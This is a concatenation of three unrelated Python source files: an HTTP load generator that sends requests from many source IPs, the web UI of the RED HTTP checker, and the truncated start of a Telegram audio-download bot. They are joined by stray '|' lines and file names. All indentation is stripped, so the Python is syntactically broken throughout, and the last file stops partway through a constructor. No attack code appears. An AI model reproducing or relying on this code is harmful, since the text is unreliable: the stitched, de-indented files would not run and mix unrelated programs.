# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import socket
import time
import select
import threading
import errno
import random
import json
import argparse
import sys
import os
import signal
class HTTPgen:
def __init__(self, proxy, timeouts, cache_dns, debug=False):
if proxy != None:
self.proxy_ip = proxy[0]
self.proxy_port = proxy[1]
else:
self.proxy_ip = None
self.proxy_port = None
self.connect_timeout = timeouts[0]
self.read_timeout = timeouts[1]
self.response_timeout = timeouts[2]
self.cache_dns = cache_dns
self.debug = debug
#
self.counters_lock = threading.Lock()
self.clear_counters()
self.load_reuse_stats()
#
self.sockets = {}
self.sockets_lock = threading.Lock()
self.epoll = select.epoll()
self.should_run = True
self.src_last_used = {}
self.dns_cache = {}
self.handle = threading.Thread(target=self.start_thread, args=("handler", self.handle_thread))
self.handle.start()
self.busy = None
def save_reuse_stats(self):
f = open("/tmp/reuse_stats.json", "w")
json.dump(self.src_last_used, f)
f.close()
def load_reuse_stats(self):
try:
f = open("/tmp/reuse_stats.json", "r")
self.src_last_used = json.load(f)
f.close()
except:
pass
def clear_counters(self, interval=1):
zero = {
'ok' : 0,
'invalid' : 0,
'timeouts' : {},
'error' : 0,
}
self.counters_lock.acquire()
try:
old = self.counters
except AttributeError:
old = zero
self.counters = zero
self.counters_lock.release()
# divide by interval before returning
for c in old.keys():
if type(old[c]) == int:
old[c] = int(round(float(old[c]) / interval))
elif type(old[c]) == dict:
for cc in old[c].keys():
old[c][cc] = old[c][cc] / interval
return old
def destroy(self):
self.should_run = False
self.handle.join()
if self.busy != None: self.busy.join()
self.save_reuse_stats()
def get_host_ip(self, host):
if host in self.dns_cache: return self.dns_cache[host]
try:
ip = socket.gethostbyname(host)
except socket.gaierror, e:
print >>sys.stderr, "Unable to translate host %s to IP: %s" % (host, str(e),)
if self.debug: raise
return None
if self.cache_dns: self.dns_cache[host] = ip
return ip
def try_connect(self, socket_info):
sock = socket_info['object']
# connect (with non-blocking)
try:
if self.proxy_ip != None:
sock.connect( (self.proxy_ip, self.proxy_port) )
else:
sock.connect( (self.get_host_ip(socket_info['real_host']), 80) )
except socket.error, e:
if e.args[0] in (errno.EINPROGRESS, errno.EALREADY, errno.EWOULDBLOCK):
pass
elif e.args[0] in (errno.ECONNREFUSED, errno.ECONNRESET):
socket_info['state'] = 'connection_refused'
elif e.args[0] == errno.EISCONN:
pass # TODO: ???
else:
raise
else:
socket_info['connected_time'] = time.time()
socket_info['state'] = 'sent'
socket_info['object'].send(socket_info['request'])
def cleanup(self, sockfd):
# if the socket fd was used, make sure we clean it up
self.sockets_lock.acquire()
if sockfd in self.sockets:
try:
self.epoll.unregister(sockfd)
except: pass
try:
self.sockets[sockfd]['object'].shutdown(socket.SHUT_RDWR)
self.sockets[sockfd]['object'].close()
self.sockets[sockfd]['object'] = None
except: pass
del self.sockets[sockfd]
self.sockets_lock.release()
def request(self, src_ip, proto, host, path):
while True:
# port reuse check - seems that FortiPoC is reusing ports too soon
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
sock.bind( (src_ip, 0) )
info = "%s:%i" % sock.getsockname()
if info in self.src_last_used and (time.time() - self.src_last_used[info]) < 121:
# print "socket %s reused too soon" % (info,)
continue
else:
self.src_last_used[info] = time.time()
break
#
sock.setblocking(0)
socket_info = {
'init_time' : time.time(),
'connected_time' : None,
'last_read_time' : None,
'object' : sock,
'event' : threading.Event(),
'state' : 'connecting',
'data' : '',
'real_host' : host,
}
if self.proxy_ip != None:
socket_info['request'] = 'GET %s://%s%s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' % (
proto,
host,
path,
host,
)
else:
socket_info['request'] = 'GET %s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' % (
path,
host,
)
sockfd = sock.fileno()
self.cleanup(sockfd)
self.sockets_lock.acquire()
self.sockets[sockfd] = socket_info
self.sockets_lock.release()
# register our new socket
self.epoll.register(sockfd, select.EPOLLIN | select.EPOLLERR | select.EPOLLHUP)
self.try_connect(self.sockets[sockfd])
def handle_thread(self):
while self.should_run:
# first process sockets with event
sockfds = self.epoll.poll(timeout=0.1)
self.sockets_lock.acquire()
for (sockfd, event) in sockfds:
# incoming data
if event == select.EPOLLIN:
# do not start reading if we haven't noticed the socket is connected
if self.sockets[sockfd]['connected_time'] == None: continue
#
part = self.sockets[sockfd]['object'].recv(1024)
self.sockets[sockfd]['data'] += part
if len(part) == 0:
self.epoll.unregister(sockfd)
self.sockets[sockfd]['state'] = 'closed'
self.sockets[sockfd]['event'].set()
else:
self.sockets[sockfd]['state'] = 'reading'
self.sockets[sockfd]['last_read_time'] = time.time()
elif event == select.EPOLLERR:
self.epoll.unregister(sockfd)
self.sockets[sockfd]['state'] = 'error'
self.sockets[sockfd]['event'].set()
elif event == select.EPOLLHUP:
# ignore as this can come before EPOLLIN
pass
# then process all of them for timeouts, etc.
for sockfd in self.sockets.keys():
socket_info = self.sockets[sockfd]
# if it is still not connected, try again
if socket_info['state'] == 'connecting':
if (time.time()-socket_info['init_time']) > self.connect_timeout:
try: self.epoll.unregister(sockfd)
except: pass
socket_info['state'] = 'connect_timeout'
socket_info['event'].set()
else:
self.try_connect(socket_info)
elif socket_info['state'] == 'sent':
if (time.time()-socket_info['connected_time']) > self.read_timeout:
try: self.epoll.unregister(sockfd)
except: pass
socket_info['state'] = 'initial_response_timeout'
socket_info['event'].set()
elif socket_info['state'] == 'reading':
if (time.time()-socket_info['last_read_time']) > self.read_timeout:
try: self.epoll.unregister(sockfd)
except: pass
socket_info['state'] = 'data_timeout'
socket_info['event'].set()
elif socket_info['state'] == 'connection_refused':
try: self.epoll.unregister(sockfd)
except: pass
socket_info['event'].set()
# enforce the full response time (only for connected sockets)
if socket_info['connected_time'] != None:
if (time.time()-socket_info['connected_time']) > self.response_timeout:
try: self.epoll.unregister(sockfd)
except: pass
socket_info['state'] = 'response_timeout'
socket_info['event'].set()
self.sockets_lock.release()
def parse_url(self, url):
r = {}
r['proto'] = url.split('://')[0]
r['host'] = url.split('://', 1)[1].split('/', 1)[0]
try:
r['path'] = '/' + url.split('://', 1)[1].split('/', 1)[1]
except:
r['path'] = '/'
if r['proto'] != 'http':
print >>sys.stderr, "Invalid url '%s': only 'http' protocol is supported at the moment" % (url,)
self.should_run = False
return r
def keep_busy(self, request_count, source_ips, urls, reserved):
self.busy_data = {
'request_count' : request_count,
'source_ips' : source_ips,
'urls' : [],
'reserved' : {},
}
for url in urls:
self.busy_data['urls'].append(self.parse_url(url))
for ip in reserved.keys():
self.busy_data['reserved'][ip] = self.parse_url(reserved[ip])
self.busy_data['reserved'][ip]['lastused'] = 0
self.busy = threading.Thread(target=self.start_thread, args=("starter", self.keep_busy_thread))
self.busy.start()
self.collect = threading.Thread(target=self.start_thread, args=("collector", self.collect_responses_thread))
self.collect.start()
def start_thread(self, name, function):
try:
function()
except Exception, e:
print >>sys.stderr, "Thread '%s' raised exception: %s" % (name, str(e),)
if self.debug: raise
signal.alarm(5)
self.should_run = False
def update_source_ips(self, source_ips):
self.busy_data['source_ips'] = source_ips
def keep_busy_thread(self):
while self.should_run:
start = time.time()
for i in range(self.busy_data['request_count']):
while True:
ip = random.sample(self.busy_data['source_ips'], 1)[0]
if ip in self.busy_data['reserved']:
url = self.busy_data['reserved'][ip]
if (self.busy_data['reserved'][ip]['lastused'] + 40) > start:
continue
else:
self.busy_data['reserved'][ip]['lastused'] = start
break
else:
url = random.sample(self.busy_data['urls'], 1)[0]
break
self.request( ip, url['proto'], url['host'], url['path'] )
time.sleep(float(1)/(float(self.busy_data['request_count'])*1.1))
end = time.time()
sleep = (float(1)-(end-start))
if sleep > 0: time.sleep(sleep)
def collect_responses_thread(self):
while self.should_run:
to_clean = []
started = time.time()
sockfds = self.sockets.keys()
for sockfd in sockfds:
if not self.sockets[sockfd]['event'].is_set(): continue
state = self.sockets[sockfd]['state']
data = self.sockets[sockfd]['data']
self.counters_lock.acquire()
if state == 'closed':
if data.startswith('HTTP/1.1 200 OK'):
self.counters['ok'] += 1
else:
self.counters['invalid'] += 1
elif state in ('connect_timeout', 'initial_response_timeout', 'data_timeout', 'response_timeout'):
# print "timeout: " + str(self.sockets[sockfd]['object'].getsockname())
if state not in self.counters['timeouts']: self.counters['timeouts'][state] = 0
self.counters['timeouts'][state] += 1
else:
self.counters['error'] += 1
self.counters_lock.release()
to_clean.append(sockfd)
for sockfd in to_clean:
self.cleanup(sockfd)
ended = time.time()
if (ended-started < 1):
time.sleep( ended-started )
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='HTTP traffic generator')
parser.add_argument('--urls', help='File with the URLs (default /etc/httpgen/urls)', default="/etc/httpgen/urls")
parser.add_argument('--ips', help='File with the source IP addresses (default /etc/httpgen/ips)', default="/etc/httpgen/ips")
parser.add_argument('--proxy', help='Proxy server in IP:port format')
parser.add_argument('--ctimeout', type=int, default=3, help='Connect timeout')
parser.add_argument('--rtimeout', type=int, default=3, help='Timeout for each read')
parser.add_argument('--stimeout', type=int, default=5, help='Session timeout')
parser.add_argument('--reqs', type=int, help='Requests per second', required=True)
parser.add_argument('--stats', help='Statistics output in format filename:interval', default="/dev/stdout:1")
parser.add_argument('--reduce', help='Reduce the number of source IPs, format seconds:count', default="0:0")
parser.add_argument('--reserve', help='Reserve the IP address for specific URL, format IP:URL', action='append', default=[])
parser.add_argument('--cachedns', action='store_true', help='Remember IP for hostnames (no TTL check)', default=False)
parser.add_argument('--debug', action='store_true', help='Enable debugging (do not use for production)', default=False)
args = parser.parse_args()
if args.proxy != None:
try:
proxy_ip = args.proxy.split(':', 1)[0]
proxy_port = int(args.proxy.split(':', 1)[1])
proxy = (proxy_ip, proxy_port)
except:
print >>sys.stderr, "Proxy address is not in the right format (IP:port)."
sys.exit(1)
else:
proxy = None
try:
stats_file = args.stats.split(':', 1)[0]
stats_int = int(args.stats.split(':', 1)[1])
except:
print >>sys.stderr, "Statistics output is not in the right format (filename:interval)."
sys.exit(1)
try:
reduce_time = int(args.reduce.split(':', 1)[0])
reduce_count = int(args.reduce.split(':', 1)[1])
except:
print >>sys.stderr, "IP reduce is in not in the right format (seconds:count)."
sys.exit(1)
reserved = {}
try:
for tmp in args.reserve:
reserved[tmp.split(':', 1)[0]] = tmp.split(':', 1)[1]
except:
print >>sys.stderr, "IP/URL reservation is not in the right format (IP:URL)"
sys.exit(1)
ips = []
try:
f = open(args.ips, "r")
while True:
line = f.readline()
if len(line) == 0: break
ips.append(line.strip())
except Exception, e:
print >>sys.stderr, "Cannot read source IPs from %s: %s" % (args.ips, str(e),)
sys.exit(1)
urls = []
try:
f = open(args.urls, "r")
while True:
line = f.readline()
if len(line) == 0: break
urls.append(line.strip())
except Exception, e:
print >>sys.stderr, "Cannot read URLs from %s: %s" % (args.urls, str(e),)
sys.exit(1)
try:
stats = file(stats_file, "a")
except Exception, e:
print >>sys.stderr, "Cannot output statistics file \"%s\": %s" % (stats_file, str(e),)
sys.exit(1)
hg = HTTPgen( proxy, (args.ctimeout, args.rtimeout, args.stimeout), args.cachedns, args.debug )
hg.keep_busy(args.reqs, ips, urls, reserved)
started = time.time()
try:
while hg.should_run:
counters = hg.clear_counters(interval=stats_int)
timeouts = 0
for t in counters['timeouts'].keys(): timeouts += counters['timeouts'][t]
print >>stats, "%i %i %i %i %i %i" % (int(time.time()), args.reqs, counters['ok'], timeouts, counters['invalid'], counters['error'],)
stats.flush()
time.sleep(stats_int)
#
if reduce_time > 0 and time.time() > started+reduce_time:
reduce_time = 0
hg.update_source_ips(random.sample(ips, reduce_count))
except KeyboardInterrupt:
pass
stats.close()
hg.destroy()
|
webui.py
|
#!/usr/bin/env python
"""
A Web UI for RED, the Resource Expert Droid.
"""
__author__ = "Mark Nottingham <mnot@mnot.net>"
__copyright__ = """\
Copyright (c) 2008-2011 Mark Nottingham
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import cgi
import cPickle as pickle
import gzip
import locale
import os
import shutil
import sys
import tempfile
import time
from urlparse import urlsplit
import zlib
assert sys.version_info[0] == 2 and sys.version_info[1] >= 5, \
"Please use Python 2.5 or greater"
import nbhttp
from redbot import droid
from redbot.formatter import find_formatter, html
### Configuration ##########################################################
# TODO: make language configurable/dynamic
lang = "en"
charset = "utf-8"
# Where to store exceptions; set to None to disable traceback logging
logdir = 'exceptions'
# how many seconds to allow it to run for
max_runtime = 60
# Where to keep files for future reference, when users save them. None
# to disable saving.
save_dir = '/var/state/redbot/'
# how long to store things when users save them, in days.
save_days = 30
# URI root for static assets (absolute or relative, but no trailing '/')
html.static_root = 'static'
# directory containing files to append to the front page; None to disable
html.extra_dir = "extra"
# show errors in the browser
debug = False
### End configuration ######################################################
# HTML template for error bodies
error_template = u"""\
<p class="error">
%s
</p>
"""
try:
locale.setlocale(locale.LC_ALL, locale.normalize(lang))
except:
locale.setlocale(locale.LC_ALL, '')
class RedWebUi(object):
"""
A Web UI for RED.
Given a URI, run RED on it and present the results to output as HTML.
If descend is true, spider the links and present a summary.
"""
def __init__(self, base_uri, method, query_string, output_hdrs):
self.base_uri = base_uri
self.method = method
self._output_hdrs = output_hdrs
self.output_body = None
self.body_done = None
self.test_uri = None
self.req_hdrs = None
self.format = None
self.test_id = None
self.descend = None
self.save = None
self.parse_qs(method, query_string)
self.start = time.time()
self.timeout = nbhttp.schedule(max_runtime, self.timeoutError)
if self.save and save_dir and self.test_id:
self.save_test()
elif self.test_id:
self.load_saved_test()
elif self.test_uri:
self.run_test()
else:
self.show_default()
def output_hdrs(self, *rgs):
(output_body, body_done) = self._output_hdrs(*rgs)
self.output_body = output_body
def remove_timeout():
self.timeout.delete()
body_done()
self.body_done = None
self.body_done = remove_timeout
def save_test(self):
"""Save a previously run test_id."""
try:
# touch the save file so it isn't deleted.
os.utime(
os.path.join(save_dir, self.test_id),
(
nbhttp.now(),
nbhttp.now() + (save_days * 24 * 60 * 60)
)
)
location = "?id=%s" % self.test_id
if self.descend:
location = "%s&descend=True" % location
self.output_hdrs(
"303 See Other", [
("Location", location)
])
self.output_body("Redirecting to the saved test page...")
except (OSError, IOError):
self.output_hdrs(
"500 Internal Server Error", [
("Content-Type", "text/html; charset=%s" % charset),
])
# TODO: better error message (through formatter?)
self.output_body(
error_template % "Sorry, I couldn't save that."
)
self.body_done()
def load_saved_test(self):
"""Load a saved test by test_id."""
try:
fd = gzip.open(os.path.join(
save_dir, os.path.basename(self.test_id)
))
mtime = os.fstat(fd.fileno()).st_mtime
except (OSError, IOError, zlib.error):
self.output_hdrs(
"404 Not Found", [
("Content-Type", "text/html; charset=%s" % charset),
("Cache-Control", "max-age=600, must-revalidate")
])
# TODO: better error page (through formatter?)
self.output_body(error_template %
"I'm sorry, I can't find that saved response."
)
self.body_done()
return
is_saved = mtime > nbhttp.now()
try:
ired = pickle.load(fd)
except (pickle.PickleError, EOFError):
self.output_hdrs(
"500 Internal Server Error", [
("Content-Type", "text/html; charset=%s" % charset),
("Cache-Control", "max-age=600, must-revalidate")
])
# TODO: better error page (through formatter?)
self.output_body(error_template %
"I'm sorry, I had a problem reading that response."
)
self.body_done()
return
finally:
fd.close()
formatter = find_formatter(self.format, 'html', self.descend)(
self.base_uri, ired.uri, ired.orig_req_hdrs, lang,
self.output, allow_save=(not is_saved), is_saved=True,
test_id=self.test_id
)
self.output_hdrs(
"200 OK", [
("Content-Type", "%s; charset=%s" % (
formatter.media_type, charset)),
("Cache-Control", "max-age=3600, must-revalidate")
])
formatter.start_output()
formatter.set_red(ired)
formatter.finish_output()
self.body_done()
def run_test(self):
"""Test a URI."""
if save_dir and os.path.exists(save_dir):
try:
fd, path = tempfile.mkstemp(prefix='', dir=save_dir)
test_id = os.path.split(path)[1]
except (OSError, IOError):
# Don't try to store it.
test_id = None
else:
test_id = None
formatter = find_formatter(self.format, 'html', self.descend)(
self.base_uri, self.test_uri, self.req_hdrs, lang,
self.output, allow_save=test_id, is_saved=False,
test_id=test_id, descend=self.descend
)
self.output_hdrs(
"200 OK", [
("Content-Type", "%s; charset=%s" % (
formatter.media_type, charset)),
("Cache-Control", "max-age=60, must-revalidate")
])
ired = droid.InspectingResourceExpertDroid(
self.test_uri,
req_hdrs=self.req_hdrs,
status_cb=formatter.status,
body_procs=[formatter.feed],
descend=self.descend
)
# sys.stdout.write(pickle.dumps(ired.state))
formatter.set_red(ired.state)
formatter.start_output()
def done():
formatter.finish_output()
self.body_done()
if test_id:
try:
tmp_file = gzip.open(path, 'w')
pickle.dump(ired.state, tmp_file)
tmp_file.close()
except (IOError, zlib.error, pickle.PickleError):
pass # we don't cry if we can't store it.
# objgraph.show_growth()
ired.run(done)
def show_default(self):
"""Show the default page."""
formatter = html.BaseHtmlFormatter(
self.base_uri, self.test_uri, self.req_hdrs,
lang, self.output
)
self.output_hdrs(
"200 OK", [
("Content-Type", "%s; charset=%s" % (
formatter.media_type, charset)
),
("Cache-Control", "max-age=300")
])
formatter.start_output()
formatter.finish_output()
self.body_done()
def parse_qs(self, method, qs):
"""Given an method and a query-string dict, set attributes."""
self.test_uri = qs.get('uri', [''])[0].decode(charset, 'replace')
self.req_hdrs = [tuple(rh.split(":", 1))
for rh in qs.get("req_hdr", [])
if rh.find(":") > 0
]
self.format = qs.get('format', ['html'])[0]
self.test_id = qs.get('id', [None])[0]
self.descend = qs.get('descend', [False])[0]
if method == "POST":
self.save = qs.get('save', [False])[0]
else:
self.save = False
def output(self, chunk):
self.output_body(chunk.encode(charset, 'replace'))
def timeoutError(self):
""" Max runtime reached."""
self.output(error_template % ("RED timeout."))
self.body_done()
# adapted from cgitb.Hook
def except_handler_factory(out=None):
if not out:
out = sys.stdout.write
def except_handler(etype=None, evalue=None, etb=None):
"""
Log uncaught exceptions and display a friendly error.
"""
if not etype or not evalue or not etb:
etype, evalue, etb = sys.exc_info()
import cgitb
out(cgitb.reset())
if logdir is None:
out(error_template % """
A problem has occurred, but it probably isn't your fault.
""")
else:
import stat
import traceback
try:
doc = cgitb.html((etype, evalue, etb), 5)
except: # just in case something goes wrong
doc = ''.join(traceback.format_exception(etype, evalue, etb))
if debug:
out(doc)
return
try:
while etb.tb_next != None:
etb = etb.tb_next
e_file = etb.tb_frame.f_code.co_filename
e_line = etb.tb_frame.f_lineno
ldir = os.path.join(logdir, os.path.split(e_file)[-1])
if not os.path.exists(ldir):
os.umask(0000)
os.makedirs(ldir)
(fd, path) = tempfile.mkstemp(
prefix="%s_" % e_line, suffix='.html', dir=ldir
)
fh = os.fdopen(fd, 'w')
fh.write(doc)
fh.close()
os.chmod(path, stat.S_IROTH)
out(error_template % """\
A problem has occurred, but it probably isn't your fault.
RED has remembered it, and we'll try to fix it soon.""")
except:
out(error_template % """\
A problem has occurred, but it probably isn't your fault.
RED tried to save it, but it couldn't! Oops.<br>
Please e-mail the information below to
<a href='mailto:red@redbot.org'>red@redbot.org</a>
and we'll look into it.""")
out("<h3>Original Error</h3>")
out("<pre>")
out(''.join(traceback.format_exception(etype, evalue, etb)))
out("</pre>")
out("<h3>Write Error</h3>")
out("<pre>")
etype, value, tb = sys.exc_info()
out(''.join(traceback.format_exception(etype, value, tb)))
out("</pre>")
sys.exit(1) # We're in an uncertain state, so we must die horribly.
return except_handler
def mod_python_handler(r):
"""Run RED as a mod_python handler."""
from mod_python import apache
status_lookup = {
100: apache.HTTP_CONTINUE ,
101: apache.HTTP_SWITCHING_PROTOCOLS ,
102: apache.HTTP_PROCESSING ,
200: apache.HTTP_OK ,
201: apache.HTTP_CREATED ,
202: apache.HTTP_ACCEPTED ,
200: apache.HTTP_OK ,
200: apache.HTTP_OK ,
201: apache.HTTP_CREATED ,
202: apache.HTTP_ACCEPTED ,
203: apache.HTTP_NON_AUTHORITATIVE ,
204: apache.HTTP_NO_CONTENT ,
205: apache.HTTP_RESET_CONTENT ,
206: apache.HTTP_PARTIAL_CONTENT ,
207: apache.HTTP_MULTI_STATUS ,
300: apache.HTTP_MULTIPLE_CHOICES ,
301: apache.HTTP_MOVED_PERMANENTLY ,
302: apache.HTTP_MOVED_TEMPORARILY ,
303: apache.HTTP_SEE_OTHER ,
304: apache.HTTP_NOT_MODIFIED ,
305: apache.HTTP_USE_PROXY ,
307: apache.HTTP_TEMPORARY_REDIRECT ,
400: apache.HTTP_BAD_REQUEST ,
401: apache.HTTP_UNAUTHORIZED ,
402: apache.HTTP_PAYMENT_REQUIRED ,
403: apache.HTTP_FORBIDDEN ,
404: apache.HTTP_NOT_FOUND ,
405: apache.HTTP_METHOD_NOT_ALLOWED ,
406: apache.HTTP_NOT_ACCEPTABLE ,
407: apache.HTTP_PROXY_AUTHENTICATION_REQUIRED,
408: apache.HTTP_REQUEST_TIME_OUT ,
409: apache.HTTP_CONFLICT ,
410: apache.HTTP_GONE ,
411: apache.HTTP_LENGTH_REQUIRED ,
412: apache.HTTP_PRECONDITION_FAILED ,
413: apache.HTTP_REQUEST_ENTITY_TOO_LARGE ,
414: apache.HTTP_REQUEST_URI_TOO_LARGE ,
415: apache.HTTP_UNSUPPORTED_MEDIA_TYPE ,
416: apache.HTTP_RANGE_NOT_SATISFIABLE ,
417: apache.HTTP_EXPECTATION_FAILED ,
422: apache.HTTP_UNPROCESSABLE_ENTITY ,
423: apache.HTTP_LOCKED ,
424: apache.HTTP_FAILED_DEPENDENCY ,
426: apache.HTTP_UPGRADE_REQUIRED ,
500: apache.HTTP_INTERNAL_SERVER_ERROR ,
501: apache.HTTP_NOT_IMPLEMENTED ,
502: apache.HTTP_BAD_GATEWAY ,
503: apache.HTTP_SERVICE_UNAVAILABLE ,
504: apache.HTTP_GATEWAY_TIME_OUT ,
505: apache.HTTP_VERSION_NOT_SUPPORTED ,
506: apache.HTTP_VARIANT_ALSO_VARIES ,
507: apache.HTTP_INSUFFICIENT_STORAGE ,
510: apache.HTTP_NOT_EXTENDED ,
}
r.content_type = "text/html"
def output_hdrs (status, hdrs):
code, phrase = status.split(None, 1)
r.status = status_lookup.get(
int(code),
apache.HTTP_INTERNAL_SERVER_ERROR
)
for hdr in hdrs:
r.headers_out[hdr[0]] = hdr[1]
return r.write, nbhttp.stop
query_string = cgi.parse_qs(r.args or "")
try:
RedWebUi(r.unparsed_uri, r.method, query_string, output_hdrs)
except:
except_handler_factory(r.write)()
return apache.OK
def cgi_main():
"""Run RED as a CGI Script."""
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
base_uri = "http://%s%s%s" % ( # TODO: only supports HTTP
os.environ.get('HTTP_HOST'),
os.environ.get('SCRIPT_NAME'),
os.environ.get('PATH_INFO', '')
)
method = os.environ.get('REQUEST_METHOD')
query_string = cgi.parse_qs(os.environ.get('QUERY_STRING', ""))
def output_hdrs(status, res_hdrs):
sys.stdout.write("Status: %s\n" % status)
for k, v in res_hdrs:
sys.stdout.write("%s: %s\n" % (k, v))
sys.stdout.write("\n")
return sys.stdout.write, nbhttp.stop
try:
RedWebUi(base_uri, method, query_string, output_hdrs)
nbhttp.run()
except:
except_handler_factory(sys.stdout.write)()
def standalone_main(port, static_dir):
"""Run RED as a standalone Web server."""
# load static files
static_files = {}
def static_walker(arg, dirname, names):
for name in names:
try:
path = os.path.join(dirname, name)
if os.path.isdir(path):
continue
uri = os.path.relpath(path, static_dir)
static_files["/static/%s" % uri] = open(path).read()
except IOError:
sys.stderr.write(
"* Problem loading %s\n" % path
)
os.path.walk(static_dir, static_walker, "")
sys.stderr.write("* Static files loaded.\n")
def red_handler (method, uri, req_hdrs, res_start, req_pause):
p_uri = urlsplit(uri)
if static_files.has_key(p_uri.path):
res_body, res_done = res_start("200", "OK", [], nbhttp.dummy)
res_body(static_files[p_uri.path])
res_done(None)
elif p_uri.path == "/":
query_string = cgi.parse_qs(p_uri.query)
def output_hdrs (status, hdrs):
code, phrase = status.split(None, 1)
return res_start(code, phrase, hdrs, nbhttp.dummy)
try:
RedWebUi('/', method, query_string, output_hdrs)
except:
sys.stderr.write("""
*** FATAL ERROR
RED has encountered a fatal error which it really, really can't recover from
in standalone server mode. Details follow.
""")
except_handler_factory(sys.stderr.write)()
sys.stderr.write("\n")
nbhttp.stop()
sys.exit(1)
else:
res_body, res_done = res_start(
"404", "Not Found", [], nbhttp.dummy
)
res_done(None)
return nbhttp.dummy, nbhttp.dummy
nbhttp.Server("", port, red_handler)
try:
nbhttp.run()
except KeyboardInterrupt:
sys.stderr.write("Stopping...\n")
nbhttp.stop()
# TODO: logging
# TODO: extra resources
def standalone_monitor (port, static_dir):
"""Fork a process as a standalone Web server and watch it."""
from multiprocessing import Process
while True:
p = Process(target=standalone_main, args=(port, static_dir))
sys.stderr.write("* Starting RED server...\n")
p.start()
p.join()
# TODO: listen to socket and drop privs
if __name__ == "__main__":
if os.environ.has_key('GATEWAY_INTERFACE'): # CGI
cgi_main()
else:
# standalone server
from optparse import OptionParser
usage = "Usage: %prog [options] port static_dir"
version = "RED version %s" % droid.__version__
option_parser = OptionParser(usage=usage, version=version)
(options, args) = option_parser.parse_args()
if len(args) < 2:
option_parser.error(
"Please specify a port and a static directory."
)
try:
port = int(args[0])
except ValueError:
option_parser.error(
"Port is not an integer."
)
static_dir = args[1]
sys.stderr.write(
"Starting standalone server on PID %s...\n" % os.getpid()
)
# import pdb
# pdb.run('standalone_main(port, static_dir)')
standalone_main(port, static_dir)
# standalone_monitor(port, static_dir)
|
scdlbot.py
|
# -*- coding: utf-8 -*-
"""Main module."""
import gc
import pathlib
import random
import shelve
import shutil
from datetime import datetime
from multiprocessing import Process, Queue
from queue import Empty
from subprocess import PIPE, TimeoutExpired # skipcq: BAN-B404
from urllib.parse import urljoin
from uuid import uuid4
import ffmpeg
from boltons.urlutils import find_all_links
from mutagen.id3 import ID3
from mutagen.mp3 import EasyMP3 as MP3
from prometheus_client import Summary
from telegram import (Message, Chat, ChatMember, MessageEntity, ChatAction, InlineKeyboardMarkup,
InlineKeyboardButton, InlineQueryResultAudio, Update)
from telegram.error import (TelegramError, Unauthorized, BadRequest,
TimedOut, ChatMigrated, NetworkError)
from telegram.ext import (Updater, CommandHandler, MessageHandler, Filters, InlineQueryHandler,
CallbackQueryHandler, CallbackContext)
from telegram.ext.dispatcher import run_async
from scdlbot.utils import *
logger = logging.getLogger(__name__)
REQUEST_TIME = Summary('request_processing_seconds', 'Time spent processing request')
class ScdlBot:
def __init__(self, tg_bot_token, proxies=None,
store_chat_id=None, no_flood_chat_ids=None, alert_chat_ids=None,
dl_dir="/tmp/scdlbot", dl_timeout=300, max_convert_file_size=80_000_000,
chat_storage_file="/tmp/scdlbotdata", app_url=None,
serve_audio=False, cookies_file=None, source_ips=None):
self.SERVE_AUDIO = serve_audio
if self.SERVE_AUDIO:
self.MAX_TG_FILE_SIZE = 19_000_000
else:
self.MAX_TG_FILE_SIZE = 45_000_000
self.SITES = {
"sc": "soundcloud",
"scapi": "api.soundcloud",
"bc": "bandcamp",
"yt": "youtu",
}
self.APP_URL = app_url
self.DL_TIMEOUT = dl_timeout
self.MAX_CONVERT_FILE_SIZE = max_convert_file_size
self.HELP_TEXT = get_response_text('help.tg.md')
self.SETTINGS_TEXT = get_response_text('settings.tg.md')
self.DL_TIMEOUT_TEXT = get_response_text('dl_timeout.txt').format(self.DL_TIMEOUT // 60)
self.WAIT_BIT_TEXT = [get_response_text('wait_bit.txt'), get_response_text('wait_beat.txt'),
get_response_text('wait_beet.txt')]
self.NO_AUDIO_TEXT = get_response_text('no_audio.txt')
